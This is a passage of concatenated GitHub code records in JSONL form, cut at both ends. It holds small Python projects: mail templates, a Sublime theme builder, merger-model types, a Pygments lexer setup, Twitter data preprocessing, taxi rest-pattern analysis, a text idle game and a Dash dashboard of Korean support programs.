consumption=value)\n return msg\n\n\ndef createRefilWarning(value, date, amount, 
recipients=[os.getenv('WARNING_RECIPIENT',\"luka.cetina@student.um.si\")], sender=os.getenv(\"MAIL_USERNAME\",\"nadzornikgoriva@gmail.com\")):\n msg = Message(\n subject=\"Dolivanje kurilnega olja\",\n sender=sender,\n recipients=recipients,\n )\n msg.html = render_template(\"zaznano_polnjenje.html\", date=date, amount=amount, consumption=value)\n return msg\n\ndef negativeValueWarning(date, recipients=[os.getenv('WARNING_RECIPIENT')], sender=os.getenv(\"MAIL_USERNAME\")):\n msg = Message(\n subject=\"Negativna vrednost zaznana\",\n sender=sender,\n recipients=recipients,\n )\n msg.html = render_template(\"negativna.html\", date=date)\n return msg","repo_name":"CetinaLuka/BEST2022","sub_path":"backend/Modules/MailTemplates.py","file_name":"MailTemplates.py","file_ext":"py","file_size_in_byte":1294,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"35725371312","text":"# -*- coding: utf-8 -*-\n\n\"\"\"See class `Theme`\n\n\"\"\"\n\nimport copy, os, shutil\n\nfrom string import Template\n\nfrom .color import Color\n\nclass Theme():\n \"\"\"A class for creating a Sublime Text theme.\"\"\"\n\n def __init__(self, name, icons_directory=None, theme_template_directory=None, theme_templates=None):\n \"\"\"Theme constructor.\"\"\"\n\n self.name = name\n\n # Default some properties based on name\n if theme_template_directory is None:\n theme_template_directory = theme_dir(self.name)\n\n if icons_directory is None:\n icons_directory = icons_dir(self.name)\n\n if theme_templates is None:\n theme_templates = basic_theme_templates(self.name)\n\n self.icons_directory = icons_directory\n self.theme_template_directory = theme_template_directory\n self.theme_templates = theme_templates\n\n self.options = {\n \"ThemeName\": self.name,\n }\n\n def set_iconset(self, name):\n \"\"\"Changes the theme's iconset\"\"\"\n\n self.icons_directory = icons_dir(name)\n\n def export(self, directory, package, opts=None):\n \"\"\"Exports the Theme to a file.\"\"\"\n\n if opts is None:\n opts = copy.copy(self.options)\n\n opts[\"Package\"] = package\n\n # Copy icons\n target_icons_directory = os.path.abspath(directory + os.sep + \"icons\" + os.sep)\n if os.access(target_icons_directory, os.F_OK):\n shutil.rmtree(target_icons_directory)\n shutil.copytree(self.icons_directory, target_icons_directory)\n opts[\"IconsDirectory\"] = target_icons_directory[target_icons_directory.index(package):].replace(\"\\\\\", \"/\")\n\n print(opts[\"IconsDirectory\"])\n print(self.icons_directory)\n\n # Create an alternate version of the options data where all Colors are formatted\n # as array strings instead of hex-strings as expected by .sublime-theme files\n sublime_theme_options = copy.copy(opts)\n for key in sublime_theme_options:\n if isinstance(sublime_theme_options[key], Color):\n sublime_theme_options[key] = sublime_theme_options[key].rgba_array_string()\n\n # Process theme_templates\n for template in self.theme_templates:\n\n current_options = opts\n key = template\n # Our stupid way of detecting whether or not we should use array strings for colors\n if template[0:2] == \"[]\":\n template = template[2:]\n current_options = sublime_theme_options\n\n template_file = os.path.abspath(self.theme_template_directory + os.sep + template)\n target_file = os.path.abspath(directory + os.sep + self.theme_templates[key])\n file = open(template_file, 'r')\n template = Template(file.read())\n file.close()\n content = template.substitute(current_options)\n file = open(target_file, 'w')\n 
file.write(content)\n file.close()\n\ndef theme_dir(name):\n \"\"\"Returns the standard theme template directory.\"\"\"\n\n return os.path.abspath(os.path.dirname(os.path.realpath(__file__)) + os.sep + os.path.pardir + os.sep + \"theme_templates\" + os.sep + name + os.sep)\n\ndef icons_dir(name):\n \"\"\"Returns the standard icon-sets directory.\"\"\"\n\n return os.path.abspath(os.path.dirname(os.path.realpath(__file__)) + os.sep + os.path.pardir + os.sep + \"iconsets\" + os.sep + name + os.sep)\n\ndef basic_theme_templates(name, target_name=None):\n \"\"\"Returns the standard theme template array.\"\"\"\n\n if target_name is None:\n target_name = name\n return {\n # TODO: Remove the need for the \"[]\" prepended by moving the\n # Widget files to color schemes?\n \"[]\" + name + \".sublime-theme-template\": \"..\" + os.sep + target_name + \".sublime-theme\",\n name + \"-Widget.sublime-settings-template\": \"Widget - \" + target_name + \".sublime-settings\",\n name + \"-Widget.stTheme-template\": \"Widget - \" + target_name + \".stTheme\"\n }\n","repo_name":"lytedev/lyte-theme","sub_path":"src/theme_builder/theme.py","file_name":"theme.py","file_ext":"py","file_size_in_byte":4061,"program_lang":"python","lang":"en","doc_type":"code","stars":24,"dataset":"github-code","pt":"21"} +{"seq_id":"26670656286","text":"from dataclasses import dataclass\nfrom enum import Enum\n\n\nclass MergerPolicies(Enum):\n \"\"\"\n Defines the available merger policies in the models.\n \"\"\"\n\n Strict = \"Strict\"\n \"\"\"\n The AA authorises only takeovers that, at the moment in which they are reviewed, are expected to increase total \n welfare.\n \"\"\"\n Intermediate_late_takeover_prohibited = \"Intermediate (late takeover prohibited)\"\n \"\"\"The AA blocks late takeovers, but is more lenient with early takeovers.\"\"\"\n Intermediate_late_takeover_allowed = \"Intermediate (late takeover allowed)\"\n \"\"\"The AA authorises late takeovers, but is stricter with early takeovers.\"\"\"\n Laissez_faire = \"Laissez-faire\"\n \"\"\"The intervention threshold of the AA is so high that any acquisition would be allowed.\"\"\"\n\n def abbreviation(self) -> str:\n \"\"\"\n Generates a string containing the abbreviation of the current merger policy.\n\n Returns\n -------\n str\n Abbreviation of the current merger policy.\n \"\"\"\n if self is MergerPolicies.Intermediate_late_takeover_prohibited:\n return \"$I^P$\"\n if self is MergerPolicies.Intermediate_late_takeover_allowed:\n return \"$I^A$\"\n return f\"${self.value[0]}$\"\n\n def __str__(self) -> str:\n \"\"\"\n Returns the string representation of the current merger policy.\n\n Returns\n -------\n str\n String representation of the current merger policy.\n \"\"\"\n return self.value\n\n @staticmethod\n def legend() -> str:\n \"\"\"\n Generates a string containing the legend of the possible merger policies.\n\n Returns\n -------\n str\n Containing the legend for the merger policies.\n \"\"\"\n return (\n f\"{MergerPolicies.Strict.abbreviation()}: Strict\\n\"\n f\"{MergerPolicies.Intermediate_late_takeover_prohibited.abbreviation()}:\"\n f\" Intermediate (late takeover prohibited)\\n\"\n f\"{MergerPolicies.Intermediate_late_takeover_allowed.abbreviation()}:\"\n f\" Intermediate (late takeover allowed)\\n\"\n f\"{MergerPolicies.Laissez_faire.abbreviation()}: Laissez-faire\"\n )\n\n\nclass Takeover(Enum):\n \"\"\"\n Defines the available options for a takeover of the start-up by the incumbent.\n \"\"\"\n\n No = \"No bid\"\n \"\"\"The incumbent does not bid for the 
start-up.\"\"\"\n Separating = \"Separating bid\"\n \"\"\"The incumbent offers a low takeover price targeting only the credit-rationed start-ups.\"\"\"\n Pooling = \"Pooling bid\"\n \"\"\"\n The incumbent offers a high takeover price such that a start-up would always accept, irrespective of the amount of \n its own assets.\n \"\"\"\n\n def abbreviation(self) -> str:\n \"\"\"\n Generates a string containing the abbreviation of the current takeover option.\n\n Returns\n -------\n str\n Abbreviation of the current takeover option.\n \"\"\"\n return f\"${self.value[0]}$\"\n\n def __str__(self) -> str:\n \"\"\"\n Returns the string representation of the current takeover option.\n\n Returns\n -------\n str\n String representation of the current takeover option.\n \"\"\"\n\n return self.value\n\n @staticmethod\n def legend() -> str:\n \"\"\"\n Generates a string containing the legend of the possible takeover options.\n\n Returns\n -------\n str\n Containing the legend for the takeover options.\n \"\"\"\n return (\n f\"{Takeover.No.abbreviation()}: No bid by the incumbent\\n\"\n f\"{Takeover.Separating.abbreviation()}: Separating bid by the incumbent\\n\"\n f\"{Takeover.Pooling.abbreviation()}: Pooling bid by the incumbent\"\n )\n\n\n@dataclass(frozen=True)\nclass ThresholdItem:\n \"\"\"\n Threshold item containing the name (string representation) and the value (threshold express in float value).\n \"\"\"\n\n name: str\n value: float\n include: bool = False\n \"\"\"Marks this ThresholdItem with high priority.\"\"\"\n\n def __eq__(self, other):\n return self.value == other.value\n\n def __lt__(self, other):\n return self.value < other.value\n\n\n@dataclass(frozen=True)\nclass Outcome:\n \"\"\"\n Contains the bare-bones information about the outcome of a Fumagalli_Motta_Tarantino_2020.Models.Base.MergerPolicy.\n \"\"\"\n\n early_bidding_type: Takeover\n late_bidding_type: Takeover\n development_attempt: bool\n development_outcome: bool\n early_takeover: bool\n late_takeover: bool\n\n\n@dataclass(frozen=True)\nclass Summary(Outcome):\n \"\"\"\n Summary of Fumagalli_Motta_Tarantino_2020.Models.Base.MergerPolicy.\n \"\"\"\n\n set_policy: MergerPolicies\n credit_rationed: bool\n\n\n@dataclass(frozen=True)\nclass OptimalMergerPolicySummary(Summary):\n \"\"\"\n Summary of Fumagalli_Motta_Tarantino_2020.Models.Base.OptimalMergerPolicy.\n \"\"\"\n\n optimal_policy: MergerPolicies\n\n\nclass PossibleOutcomes(Enum):\n \"\"\"\n Contains the outcomes in the models.\n \"\"\"\n\n def __init__(\n self,\n early_bidding_type: Takeover,\n early_takeover: bool,\n development_attempt: bool,\n development_outcome: bool,\n late_bidding_type: Takeover,\n late_takeover: bool,\n ):\n self.outcome = Outcome(\n early_bidding_type=early_bidding_type,\n early_takeover=early_takeover,\n development_attempt=development_attempt,\n development_outcome=development_outcome,\n late_bidding_type=late_bidding_type,\n late_takeover=late_takeover,\n )\n\n NoTakeoversSuccessfulDevelopment = (\n Takeover.No,\n False,\n True,\n True,\n Takeover.No,\n False,\n )\n \"\"\"Neither an early or late takeover occurs and the development is successful.\"\"\"\n\n NoTakeoversFailedDevelopment = (Takeover.No, False, True, False, Takeover.No, False)\n \"\"\"Neither an early or late takeover occurs and the development is unsuccessful.\"\"\"\n\n NoTakeoversDevelopmentNotAttempted = (\n Takeover.No,\n False,\n False,\n False,\n Takeover.No,\n False,\n )\n \"\"\"Neither an early or late takeover occurs and the development is not attempted.\"\"\"\n\n 
RejectedEarlySeparatingSuccessfulDevelopment = (\n Takeover.Separating,\n False,\n True,\n True,\n Takeover.No,\n False,\n )\n \"\"\"An early separating bid is rejected by the start-up and the development is successful.\"\"\"\n\n RejectedEarlySeparatingUnsuccessfulDevelopment = (\n Takeover.Separating,\n False,\n True,\n False,\n Takeover.No,\n False,\n )\n \"\"\"An early separating bid is rejected by the start-up and the development is unsuccessful.\"\"\"\n\n EarlySeparatingSuccessfulDevelopment = (\n Takeover.Separating,\n True,\n True,\n True,\n Takeover.No,\n False,\n )\n \"\"\"An early separating bid is accepted by the start-up and the development is successful.\"\"\"\n\n EarlySeparatingUnsuccessfulDevelopment = (\n Takeover.Separating,\n True,\n True,\n False,\n Takeover.No,\n False,\n )\n \"\"\"An early separating bid is accepted by the start-up and the development is unsuccessful.\"\"\"\n\n EarlySeparatingDevelopmentNotAttempted = (\n Takeover.Separating,\n True,\n False,\n False,\n Takeover.No,\n False,\n )\n \"\"\"An early separating bid is accepted by the start-up and the development is not attempted.\"\"\"\n\n EarlyPoolingSuccessfulDevelopment = (\n Takeover.Pooling,\n True,\n True,\n True,\n Takeover.No,\n False,\n )\n \"\"\"An early pooling bid is accepted by the start-up and the development is successful.\"\"\"\n\n EarlyPoolingUnsuccessfulDevelopment = (\n Takeover.Pooling,\n True,\n True,\n False,\n Takeover.No,\n False,\n )\n \"\"\"An early pooling bid is accepted by the start-up and the development is unsuccessful.\"\"\"\n\n EarlyPoolingDevelopmentNotAttempted = (\n Takeover.Pooling,\n True,\n False,\n False,\n Takeover.No,\n False,\n )\n \"\"\"An early pooling bid is accepted by the start-up and the development is not attempted.\"\"\"\n\n LatePooling = (\n Takeover.No,\n False,\n True,\n True,\n Takeover.Pooling,\n True,\n )\n \"\"\"A late pooling bid is accepted by the start-up after a successful development.\"\"\"\n\n LatePoolingRejectedEarlySeparating = (\n Takeover.Separating,\n False,\n True,\n True,\n Takeover.Pooling,\n True,\n )\n \"\"\"\n An early separating bid is rejected by the start-up and the development is successful with subsequent late takeover.\n \"\"\"\n","repo_name":"manuelbieri/Fumagalli_2020","sub_path":"Fumagalli_Motta_Tarantino_2020/Models/Types.py","file_name":"Types.py","file_ext":"py","file_size_in_byte":8902,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"42266827148","text":"from setuptools import setup, find_packages\n\nentry_points = '''\n[pygments.lexers]\nбарвінок=pygments_periwinkle_lexer:PeriwinkleLexer\n'''\n\nsetup(\n name='pygments-periwinkle-lexer',\n version='0.0.10',\n description='Лексер для Барвінку.',\n long_description=\"Пакет для Pygments, який додає підсвічування синтаксису для мови програмування Барвінок\",\n author='Федуняк Роман',\n author_email='fedynuak.roma@gmail.com',\n url='https://github.com/periwinkle-lang',\n packages=find_packages(),\n entry_points=entry_points,\n install_requires=[\n 'Pygments>=2.14.0'\n ],\n license='MIT License',\n classifiers=[\n \"License :: OSI Approved :: MIT License\",\n \"Natural Language :: Ukrainian\",\n \"Programming Language :: Python :: 3 :: Only\",\n \"Environment :: Plugins\",\n 
],\n)\n","repo_name":"periwinkle-lang/pygments-periwinkle-lexer","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":932,"program_lang":"python","lang":"uk","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"16469140642","text":"#======================================================\n# В лотерее 100 билетов. Из них 2 выигрышных.\n# - Какова вероятность того, что 2 приобретенных билета\n# окажутся выигрышными?\n#=======================================================\n\nnum_tickets = 100\nnum_win_tickets = 2\n\n# вероятность приобретения первого выигрышного билета\np_first_win_ticket = num_win_tickets / num_tickets\n\n# вероятность приобретения второго выигрышного билета после приобретения первого\np_second_win_ticket = (num_win_tickets - 1) / (num_tickets - 1)\n\n# общая вероятность того, что два приобретенных билета окажутся выигрышными\np_both_win_tickets = p_first_win_ticket * p_second_win_ticket\n\nprint(\"Вероятность получить два выигрышных билета:\",\n p_both_win_tickets, \"или ~\", round(p_both_win_tickets*100, 2), \"%\\n\")","repo_name":"enigmacat/Probability_theory_and_mathematical_statistics","sub_path":"HomeWork_01/homework04.py","file_name":"homework04.py","file_ext":"py","file_size_in_byte":1114,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"5163670594","text":"import json\nfrom os import listdir\nfrom os.path import isdir, isfile, join\n\nwith open(\"config.json\", \"r\") as f:\n data = json.load(f)\n\nuser_profile_features = data[\"user profile\"]\nuser_tweet_features = data[\"user tweet\"]\n\ndef user_profile_process(path):\n list_of_prof_features = {}\n mypath = path\n files = [f for f in listdir(mypath) if isfile(join(mypath, f))]\n for file in files:\n print(file)\n with open(join(mypath,file), 'r', encoding=\"utf8\") as f:\n temp = json.load(f)\n new_dict = {x: v for x, v in temp.items() if x in user_profile_features}\n list_of_prof_features[str(file)] = new_dict\n\n json_object = json.dumps(list_of_prof_features, indent=4)\n \n \n with open(\"Base Model's Data\\\\Logistic Regression with Particle Swarm Optimization\\\\prof.json\", \"w\", encoding=\"utf8\") as outfile:\n outfile.write(json_object)\n return 0\n\n\n\ndef user_tweet_process(path):\n size = 1000\n list_of_user_tweet_features = {}\n mypath = path\n dirs = [f for f in listdir(mypath) if isdir(join(mypath, f))]\n for dir in dirs:\n list_of_tweet = []\n path = join(mypath, dir)\n onlyfiles = [f for f in listdir(path) if isfile(join(path, f))]\n counter = 0\n for file in onlyfiles:\n with open(join(path,file), 'r', encoding=\"utf8\") as f:\n temp = json.load(f)\n new_dict = {x: v for x, v in temp.items() if x in user_tweet_features}\n list_of_tweet.append(new_dict)\n counter += 1\n if counter == 1000:\n break\n print(f\"{str(dir)} is done!\")\n list_of_user_tweet_features[str(dir)] = list_of_tweet\n\n json_object = json.dumps(list_of_user_tweet_features, indent=4)\n \n \n with open(\"Base Model's Data\\\\Logistic Regression with Particle Swarm Optimization\\\\tweet_1000.json\", \"w\", encoding=\"utf8\") as outfile:\n outfile.write(json_object)\n\n return 0 \n\ndef user_mention_process(path):\n list_of_user_mentions = {}\n mypath = path\n files = [f for f in listdir(mypath) if isfile(join(mypath, f))]\n for file in files:\n with open(join(mypath,file), 'r', encoding=\"utf8\") as f:\n temp = json.load(f)\n new_dict = {x: v for x, v in temp.items()}\n list_of_user_mentions[str(file)] = new_dict\n\n 
json_object = json.dumps(list_of_user_mentions, indent=4)\n with open(\"Base Model's Data\\\\Logistic Regression with Particle Swarm Optimization\\\\mention.json\", \"w\", encoding=\"utf8\") as outfile:\n outfile.write(json_object)\n return 0\n\n\n\n\n\n\nuser_tweet_process(\"Labeled Data\\\\Users Tweets\")\n# user_profile_process(\"Labeled Data\\\\Twitter Profiles Json\")\n# user_mention_process(\"Labeled Data\\\\Users Mentions\")","repo_name":"Mohammad-Moradi/MultiCred","sub_path":"Data_Preprocessing.py","file_name":"Data_Preprocessing.py","file_ext":"py","file_size_in_byte":2762,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"75213436853","text":"import os\nimport yaml\nimport pickle\nimport pandas as pd\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom tqdm import tqdm\nfrom utils import data_loader, display\n\nif __name__ == '__main__':\n tqdm.pandas()\n display.configure_pandas()\n display.configure_logging()\n # configure the working directory to the project root path\n with open(\"../config.yaml\", \"r\", encoding=\"utf8\") as f:\n conf = yaml.load(f, Loader=yaml.FullLoader)\n os.chdir(conf[\"project_path\"])\n\n rest_events = pd.read_parquet('data/rest/rest_events.parquet')\n\n # 统计每天休息事件发生的次数\n plate_day_counts = rest_events.groupby('license').apply(lambda x: x.groupby('day').size())\n plate_day_counts = plate_day_counts.unstack(level=-1).fillna(0)\n plate_times = plate_day_counts.mean(axis=1).round().astype(int)\n resting_times = (plate_times.value_counts() / plate_times.size).sort_index()\n print(resting_times)\n # Fig 1: 考察开始休息时间的分布\n fig = plt.figure()\n ax = fig.add_subplot(1, 1, 1)\n # Data preparation\n rest_events['time_of_day'] = rest_events['start_time'].dt.hour + rest_events['start_time'].dt.minute / 60\n ce = data_loader.load_ce(version='v5_30min')\n common = data_loader.load_trajectory_od_intersection()\n ce = ce.loc[ce['licence'].isin(common)].reset_index(drop=True)\n ce['time_of_day'] = ce['start_charging'].dt.hour + ce['start_charging'].dt.minute / 60\n # Plot\n ce.plot(y='time_of_day', kind='hist', bins=24 * 12, ax=ax, secondary_y=False, histtype='step', legend=True,\n density=True, label='Charging events')\n rest_events['time_of_day'].plot(kind='hist', bins=24 * 12, ax=ax, density=True, legend=True,\n grid=False, histtype='step', label='Resting events')\n ax.set_xticks(range(0, 25, 2))\n ax.margins(x=0)\n ax.set_title('Distribution of rest events and charging events')\n ax.set_xlabel('Time of day/ hour')\n ax.set_ylabel('Probability', )\n plt.show()\n # Resting event start time distribution\n count, division = np.histogram(rest_events['time_of_day'], bins=24 * 60)\n print(count)\n\n # Figure 2: 考察休息时长的变化\n # Data preparation\n rest_events['rest_length'] = rest_events['duration'] / 3600\n rest_events['hour'] = rest_events['start_time'].dt.hour\n rest_events['interval_in_hour'] = rest_events['start_time'].dt.minute // 30\n rest_dur = rest_events.groupby(['hour', ])['rest_length'].mean()\n # Plot\n fig = plt.figure()\n ax = fig.add_subplot(1, 1, 1)\n rest_dur.plot(style='.-', ax=ax, grid=True)\n ax.set_xticks(range(0, 24, 2))\n ax.margins(x=0)\n ax.set_title('Rest length in time of day')\n ax.set_xlabel('time of day/hour')\n ax.set_ylabel('rest length')\n plt.show()\n print(rest_events.groupby(['hour', ])['rest_length'].mean())\n\n with open(conf['mobility']['resting'], 'wb') as f:\n pickle.dump({'times': resting_times, 'distribution': count, 'duration': rest_dur}, 
f)\n","repo_name":"easysam/electric-taxi-mobility","sub_path":"s2_mobility/rest_pattern.py","file_name":"rest_pattern.py","file_ext":"py","file_size_in_byte":3012,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"17546267922","text":"import configparser, time, replit, keyboard, math, json\n# box1: [money,time,currentprice,timeleft,amount bought]\nconfig = configparser.ConfigParser()\nchoice = input(\"load or start new\")\nif choice == \"load\":\n    name = input(\"what is your save called\")\n    name = name+\".txt\"\n    print(\"loaded\")\n    config.read(name)\n    print(\"loaded save\")\nelif choice == \"start new\":\n    name = input(\"name your save\")\n    name = name+\".txt\"\n    config[\"save\"] = {\"box1\": [1,1,2,1,1],\"box1price\": 2, \"box2\": [10,5,20,5,0], \"box2price\": 20, \"box3\": [100,25,200,25,0], \"box3price\": 200, \"box4\": [1000,125,2000,125,0], \"box4price\": 2000, \"box5\": [10000,625,20000,0], \"box5price\": 20000, \"money\": 0}\n    with open(name, 'w') as configfile: config.write(configfile)\n\nsave = config[\"save\"]\nwhile True:\n    replit.clear()\n    box1 = json.loads(config.get(\"save\",\"box1\"))\n    box2 = save[\"box2\"]\n    box3 = save[\"box3\"]\n    box4 = save[\"box4\"]\n    box5 = save[\"box5\"]\n    box1price = save[\"box1price\"]\n    box2price = save[\"box2price\"]\n    box3price = save[\"box3price\"]\n    box4price = save[\"box4price\"]\n    box5price = save[\"box5price\"]\n    money = save[\"money\"]\n    print(\"you have \"+str(money))\n    print(box1[2])\n    print(\"box1 gives \"+str(int(box1[0])*int(box1[4]))+\" in \"+str(box1[1])+\" its current price is \"+str(box1[2])+\" and there are \"+str(box1[4]))\n    print(\"the current price of a box1 upgrade is \"+str(box1price))\n    print(\"to open shop press s\")\n    try:\n        if keyboard.is_pressed('s'):\n            print('Shop Opening')\n            print(\"the current price of a box1 upgrade is \"+str(box1price))\n            upgrade = int(input(\"give the number of what you would like to upgrade or hit 0 to skip\"))\n            if upgrade == 1:\n                choice = input(\"upgrade speed(s) or money(m)\")\n                if choice == 's':\n                    box1[4]+=1\n                    money-=box1price\n                    box1price*=1.5\n                    box1price = math.ceil(box1price)\n                elif choice == 'm':\n                    if box1[1] == 0.1:\n                        print(\"maximum speed already reached\")\n                    else:\n                        box1[4]+=1\n                        money-=box1price\n                        box1price*=1.5\n                        box1price = math.ceil(box1price)\n            else:\n                pass\n    except:\n        pass\n    save[\"box1\"] = box1\n    save[\"box2\"] = box2\n    save[\"box3\"] = box3\n    save[\"box4\"] = box4\n    save[\"box5\"] = box5\n    save[\"box1price\"] = box1price\n    save[\"box2price\"] = box2price\n    save[\"box3price\"] = box3price\n    save[\"box4price\"] = box4price\n    save[\"box5price\"] = box5price\n    save[\"money\"] = money\n    with open(name, 'w') as configfile: config.write(configfile)\n    time.sleep(1)","repo_name":"Will-Harmer/Idle-Game-text-based","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2769,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"17530025704","text":"#!/usr/bin/python3\ndef uniq_add(my_list=[]):\n    if my_list is None:\n        return (None)\n    seen = []\n    result = 0\n    for i in my_list:\n        if i not in seen:\n            result += i\n            seen.append(i)\n    return 
(result)\n","repo_name":"davidknoppers/holbertonschool-higher_level_programming","sub_path":"0x04-python-more_data_structures/2-uniq_add.py","file_name":"2-uniq_add.py","file_ext":"py","file_size_in_byte":265,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"74094591732","text":"import dash\nimport dash_core_components as dcc\nimport dash_html_components as html\nimport pandas as pd\nimport json\nimport urllib.request\nimport plotly.express as px\nfrom dash.dependencies import Input, Output\nfrom datetime import datetime\n\n# get datas\nurl = 'https://www.amcharts.com/lib/4/geodata/json/southKoreaHigh.json'\nhdr = {'User-Agent': 'Mozilla/5.0'}\nreq = urllib.request.Request(url, headers=hdr)\nwith urllib.request.urlopen(req) as response:\n country_json = json.load(response)\n\n# initialize datas\ncountries = {'전체': 'All', '서울': 'Seoul', '부산': 'Busan', '대구': 'Daegu', '인천': 'Incheon', '광주': 'Gwangju',\n '대전': 'Daejeon', '울산': 'Ulsan', '세종': 'Sejong', '경기': 'Gyeonggi', '강원': 'Gangwon',\n '충북': 'North Chungcheong', '충남': 'South Chungcheong', '전북': 'North Jeolla',\n '전남': 'South Jeolla', '경북': 'North Gyeongsang', '경남': 'South Gyeongsang', '제주': 'Jeju'}\npie_charts = {\n 'fields': {'name': '지원 분야', 'key': '지원분야대', 'id': ['금융', '기술', '인력', '수출', '내수', '창업', '경영', '제도', '동반성장'],\n 'select': ['금융', '기술', '인력', '수출', '내수', '창업', '경영', '제도', '동반성장']},\n 'categoies': {'name': '업종', 'key': '업종',\n 'id': ['01~03', '05~08', '10~34', '35', '36~39', '41~42', '45~47', '49~52', '55~56', '58~63', '64~66', '68',\n '70~73', '74~76', '84', '85', '86~87', '90~91', '94~96', '97~98', '99'],\n 'select': ['농업, 임업 및 어업', '광업', '제조업', '전기, 가스, 증기 및 공기 조절 공급업',\n '수도, 하수 및 폐기물 처리, 원료 재생업', '건설업', '도매 및 소매업', '운수 및 창고업', '숙박 및 음식점업',\n '정보통신업', '금융 및 보험업', '부동산업', '전문, 과학 및 기술 서비스업', '사업시설 관리, 사업 지원 및 임대 서비스업',\n '공공 행정, 국방 및 사회보장 행정', '교육 서비스업', '보건업 및 사회복지 서비스업', '예술, 스포츠 및 여가관련 서비스업',\n '협회 및 단체, 수리 및 기타 개인 서비스업', '가구 내 고용활동 및 달리 분류되지 않은 자가 소비 생산활동', '국제 및 외국기관']},\n 'targets': {'name': '기업 형태', 'key': '기업형태', 'id': ['중소기업', '중견기업', '소상공인', '전통시장', '1인기업', '창업기업', '예비창업자'],\n 'select': ['중소기업', '중견기업', '소상공인', '전통시장', '1인기업', '창업기업', '예비창업자']}\n}\nINITIAL_CHART = 'fields'\nTODAY = datetime(2020, 3, 27) # temporary date -> datetime.today()\n\n\ndef get_pie_chart(country, pie_df):\n # draw pie chart graph and return\n fig_pie = px.pie(pie_df, values='count', names='id', hover_data=['avg_inquiry'], hover_name='name',\n labels={'id': '분류', 'name': pie_charts[chart]['name'], 'count': '지원사업 개수', 'avg_inquiry': '평균 조회수'})\n fig_pie.update_traces(textposition='inside')\n return fig_pie\n\n\ndef get_scatter_chart(country, scatter_df):\n # draw scatter chart graph and return\n fig_scatter = px.scatter(scatter_df, x='등록일자', y='조회수', color='접수기관_담당부서', hover_data=['평균조회수', scatter_df.index],\n hover_name='제목', labels={'평균조회수': '하루평균조회수'})\n fig_scatter.update_layout(clickmode='event+select')\n return fig_scatter\n\n\ndef selected_data_box(data_indexs):\n # draw selected datas in selected-data-box when datas are selected in scatter graph\n return html.Ul([html.Li([html.P(projects.loc[i, '접수기관_담당부서']),\n html.H6(projects.loc[i, '제목'][:13] + '...'),\n html.Div([html.Span(projects.loc[i, '내용'])]),\n html.Div([html.Span(projects.loc[i, '지원기간'])])]) for i in data_indexs],\n id='selected-data-box')\n\n\n# data preprocessing\ndf = pd.read_csv('file/bizinfodata2.csv', encoding='utf-8')\nprojects = pd.DataFrame(\n df, columns=['제목', '내용', '지역', '지원분야대', '지원기간', '기업형태', '업종', 
'조회수', '등록일자', '접수기관_담당부서'])\nprojects['등록일자'] = projects['등록일자'].str[:10]\nprojects['내용'] = projects['내용'].str.replace('
<p>', '').str.replace( # remove and replace html tags\n    '&nbsp;', ' ').str.replace('&amp;', '&').str.replace('</p>
', '').str.replace('?', ' ').str[:20] + '...'\n# to extract local dataframe, because str.len() == 50 contains all locals\nprojects_coun = projects[projects['지역'].str.len() != 50].copy()\ncountry_projects = {}\nfor country in countries:\n data = projects_coun.loc[projects_coun['지역'].str.contains(country)]\n country_projects[countries[country]] = {'name': country, 'data': data}\n\n\n# draw geoJson\ncountry_data = {'location': [], 'name': [], 'projects': []}\nfor country in country_projects:\n country_data['location'].append(country)\n country_data['name'].append(country_projects[country]['name'])\n country_data['projects'].append(len(country_projects[country]['data']))\n\ncountry_df = pd.DataFrame(country_data)\nfig_geo = px.choropleth(country_df, geojson=country_json, locations='location', color='projects',\n color_continuous_scale=\"Viridis\", hover_name='name',\n featureidkey='properties.name', projection=\"mercator\",\n labels={'location': 'id', 'name': '지역 이름', 'projects': '지원사업 개수'})\n\nfig_geo.update_geos(fitbounds=\"locations\", visible=False)\nfig_geo.update_layout(\n margin={\"r\": 0, \"t\": 0, \"l\": 0, \"b\": 0}, clickmode='event+select')\n\n\n# draw pie chart\ncountry_projects['All'] = {'name': '전체', 'data': projects}\npie_projects = {}\nfor country in countries:\n # get country data\n pie_data = {}\n data = country_projects[countries[country]]['data']\n for chart in pie_charts:\n # get value data\n pie_df = []\n for name, select in zip(pie_charts[chart]['id'], pie_charts[chart]['select']):\n select_data = data[data[pie_charts[chart]\n ['key']].str.contains(select)]\n length = len(select_data)\n if length == 0:\n continue\n select_data = {'id': name, 'name': select, 'count': length,\n 'avg_inquiry': sum(select_data['조회수']) // length}\n pie_df.append(select_data)\n pie_df = pd.DataFrame(pie_df)\n pie_data[chart] = pie_df\n pie_projects[country] = pie_data\n\n\n# draw scatter chart\nscatter_projects = {}\nfor country in countries:\n # get country data\n data = country_projects[countries[country]]['data'].copy()\n temp_time = data['등록일자'].str.split('-')\n for i in data.index:\n # convert 'YYYY-MM-DD' to datetime(YYYY, MM, DD)\n d = temp_time[i]\n t = datetime(int(d[0]), int(d[1]), int(d[2]))\n temp_time[i] = data.loc[i, '조회수'] // (TODAY - t).days\n data['평균조회수'] = temp_time\n scatter_projects[country] = data\n\n\n# run dash\nexternal_stylesheets = ['https://codepen.io/chriddyp/pen/bWLwgP.css']\napp = dash.Dash(__name__, external_stylesheets=external_stylesheets)\n\n# app layout\napp.layout = html.Div([html.Header(),\n html.Main([html.Div([html.H1(\"Bizbot 현재 지원사업\")], id='title'),\n html.Div([html.Div([html.H5('지역별 정부지원사업'),\n dcc.Graph(id='korea-map', figure=fig_geo)]),\n html.Div([html.Div([html.P(id='pie-chart-country'),\n html.H5(id='pie-chart-value', className='chart-text-right-part')], className='chart-text'),\n html.Div([\n dcc.Dropdown(id='pie-labels', options=[{'label': pie_charts[i]['name'], 'value': i}\n for i in pie_data], value=INITIAL_CHART,\n 